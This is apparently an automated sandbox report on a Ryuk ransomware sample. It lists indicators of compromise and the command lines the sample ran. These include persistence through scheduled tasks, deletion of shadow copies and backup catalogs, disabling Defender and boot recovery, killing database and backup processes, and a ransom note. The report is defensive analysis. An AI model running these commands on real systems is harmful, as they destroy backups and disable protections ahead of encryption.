1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1732	WMIC.exe
Token: SeSecurityPrivilege	1732	WMIC.exe
Token: SeTakeOwnershipPrivilege	1732	WMIC.exe
Token: SeLoadDriverPrivilege	1732	WMIC.exe
Token: SeSystemProfilePrivilege	1732	WMIC.exe
Token: SeSystemtimePrivilege	1732	WMIC.exe
Token: SeProfSingleProcessPrivilege	1732	WMIC.exe
Token: SeIncBasePriorityPrivilege	1732	WMIC.exe
Token: SeCreatePagefilePrivilege	1732	WMIC.exe
Token: SeBackupPrivilege	1732	WMIC.exe
Token: SeRestorePrivilege	1732	WMIC.exe
Token: SeShutdownPrivilege	1732	WMIC.exe
Token: SeDebugPrivilege	1732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1732	WMIC.exe
Token: SeRemoteShutdownPrivilege	1732	WMIC.exe
Token: SeUndockPrivilege	1732	WMIC.exe
Token: SeManageVolumePrivilege	1732	WMIC.exe
Token: 33	1732	WMIC.exe
Token: 34	1732	WMIC.exe
Token: 35	1732	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1732	WMIC.exe
Token: SeSecurityPrivilege	1732	WMIC.exe
Token: SeTakeOwnershipPrivilege	1732	WMIC.exe
Token: SeLoadDriverPrivilege	1732	WMIC.exe
Token: SeSystemProfilePrivilege	1732	WMIC.exe
Token: SeSystemtimePrivilege	1732	WMIC.exe
Token: SeProfSingleProcessPrivilege	1732	WMIC.exe
Token: SeIncBasePriorityPrivilege	1732	WMIC.exe
Token: SeCreatePagefilePrivilege	1732	WMIC.exe
Token: SeBackupPrivilege	1732	WMIC.exe
Token: SeRestorePrivilege	1732	WMIC.exe
Token: SeShutdownPrivilege	1732	WMIC.exe
Token: SeDebugPrivilege	1732	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1732	WMIC.exe
Token: SeRemoteShutdownPrivilege	1732	WMIC.exe
Token: SeUndockPrivilege	1732	WMIC.exe
Token: SeManageVolumePrivilege	1732	WMIC.exe
Token: 33	1732	WMIC.exe
Token: 34	1732	WMIC.exe
Token: 35	1732	WMIC.exe
Token: SeBackupPrivilege	868	vssvc.exe
Token: SeRestorePrivilege	868	vssvc.exe
Token: SeAuditPrivilege	868	vssvc.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeSecurityPrivilege	1496	wevtutil.exe
Token: SeBackupPrivilege	1496	wevtutil.exe
Token: SeSecurityPrivilege	624	wevtutil.exe
Token: SeBackupPrivilege	624	wevtutil.exe
Token: SeSecurityPrivilege	1564	wevtutil.exe
Token: SeBackupPrivilege	1564	wevtutil.exe
Token: SeSecurityPrivilege	212	wevtutil.exe
Token: SeBackupPrivilege	212	wevtutil.exe
Token: SeSecurityPrivilege	1524	wevtutil.exe
Token: SeBackupPrivilege	1524	wevtutil.exe
Token: SeSecurityPrivilege	204	wevtutil.exe
Token: SeBackupPrivilege	204	wevtutil.exe
Token: SeSecurityPrivilege	860	wevtutil.exe
Token: SeBackupPrivilege	860	wevtutil.exe
Token: SeSecurityPrivilege	232	wevtutil.exe
Token: SeBackupPrivilege	232	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1736 wrote to memory of 920	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 920	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 920	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 920 wrote to memory of 928	920	cmd.exe	schtasks.exe
PID 920 wrote to memory of 928	920	cmd.exe	schtasks.exe
PID 920 wrote to memory of 928	920	cmd.exe	schtasks.exe
PID 1736 wrote to memory of 876	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 876	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 876	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 836	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 836	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 836	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 268	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 268	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 268	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 268 wrote to memory of 468	268	cmd.exe	schtasks.exe
PID 268 wrote to memory of 468	268	cmd.exe	schtasks.exe
PID 268 wrote to memory of 468	268	cmd.exe	schtasks.exe
PID 1736 wrote to memory of 1480	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1480	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1480	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1480 wrote to memory of 1912	1480	cmd.exe	attrib.exe
PID 1480 wrote to memory of 1912	1480	cmd.exe	attrib.exe
PID 1480 wrote to memory of 1912	1480	cmd.exe	attrib.exe
PID 1736 wrote to memory of 524	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 524	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 524	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 524 wrote to memory of 668	524	cmd.exe	schtasks.exe
PID 524 wrote to memory of 668	524	cmd.exe	schtasks.exe
PID 524 wrote to memory of 668	524	cmd.exe	schtasks.exe
PID 1736 wrote to memory of 1476	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1476	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1476	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1476 wrote to memory of 572	1476	cmd.exe	schtasks.exe
PID 1476 wrote to memory of 572	1476	cmd.exe	schtasks.exe
PID 1476 wrote to memory of 572	1476	cmd.exe	schtasks.exe
PID 1736 wrote to memory of 1700	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1700	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1700	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1700 wrote to memory of 1440	1700	cmd.exe	attrib.exe
PID 1700 wrote to memory of 1440	1700	cmd.exe	attrib.exe
PID 1700 wrote to memory of 1440	1700	cmd.exe	attrib.exe
PID 1736 wrote to memory of 1976	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1976	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1976	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1976 wrote to memory of 1764	1976	cmd.exe	attrib.exe
PID 1976 wrote to memory of 1764	1976	cmd.exe	attrib.exe
PID 1976 wrote to memory of 1764	1976	cmd.exe	attrib.exe
PID 1736 wrote to memory of 1012	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1012	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 1012	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1012 wrote to memory of 1356	1012	cmd.exe	cmd.exe
PID 1012 wrote to memory of 1356	1012	cmd.exe	cmd.exe
PID 1012 wrote to memory of 1356	1012	cmd.exe	cmd.exe
PID 1736 wrote to memory of 384	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 384	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 1736 wrote to memory of 384	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe
PID 384 wrote to memory of 1524	384	cmd.exe	cmd.exe
PID 384 wrote to memory of 1524	384	cmd.exe	cmd.exe
PID 384 wrote to memory of 1524	384	cmd.exe	cmd.exe
PID 384 wrote to memory of 872	384	cmd.exe	taskkill.exe
PID 384 wrote to memory of 872	384	cmd.exe	taskkill.exe
PID 384 wrote to memory of 872	384	cmd.exe	taskkill.exe
PID 1736 wrote to memory of 288	1736	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

1140 attrib.exe
1912 attrib.exe
1440 attrib.exe
1764 attrib.exe
1976 attrib.exe

pid	process
1140	attrib.exe
1912	attrib.exe
1440	attrib.exe
1764	attrib.exe
1976	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:1912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe" /F
3⤵
- Creates scheduled task(s)
PID:572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
PID:1356

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:384

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
PID:1524

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
PID:288

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:1988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:1864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
PID:1284

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1712

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1608

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1916

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:1276

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
PID:1472

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:1296

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:1100

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:1280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete
2⤵
PID:2032

C:\Windows\system32\cmd.exe
cmd.exe /c wmic shadowcopy delete
3⤵
PID:1976

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
2⤵
PID:884

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
PID:1636

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no
2⤵
PID:2000

C:\Windows\system32\cmd.exe
cmd.exe /c bcdedit /set {default} recoveryenabled no
3⤵
PID:272

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
4⤵
- Modifies boot configuration data using bcdedit
PID:1348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/
2⤵
PID:1200

C:\Windows\system32\cmd.exe
cmd.exe /c wbadmin delete catalog -quiet/
3⤵
PID:1920

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
4⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop avpsus /y
2⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y
2⤵
PID:872

C:\Windows\system32\net.exe
net stop McAfeeDLPAgentService /y
3⤵
PID:1552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
4⤵
PID:1608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop mfewc /y
2⤵
PID:268

C:\Windows\system32\net.exe
net stop mfewc /y
3⤵
PID:468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
4⤵
PID:564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y
2⤵
PID:1992

C:\Windows\system32\net.exe
net stop BMR Boot Service /y
3⤵
PID:2032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
4⤵
PID:764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y
2⤵
PID:556

C:\Windows\system32\net.exe
net stop NetBackup BMR MTFTP Service /y
3⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
4⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled
2⤵
PID:1988

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY start=disabled
3⤵
- Launches sc.exe
PID:624

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1200

C:\Windows\system32\sc.exe
sc config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
- Launches sc.exe
PID:2012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled
2⤵
PID:1636

C:\Windows\system32\sc.exe
sc config SQLWriter start= disabled
3⤵
- Launches sc.exe
PID:1928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1348

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:1800

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:1308

C:\Windows\system32\taskkill.exe
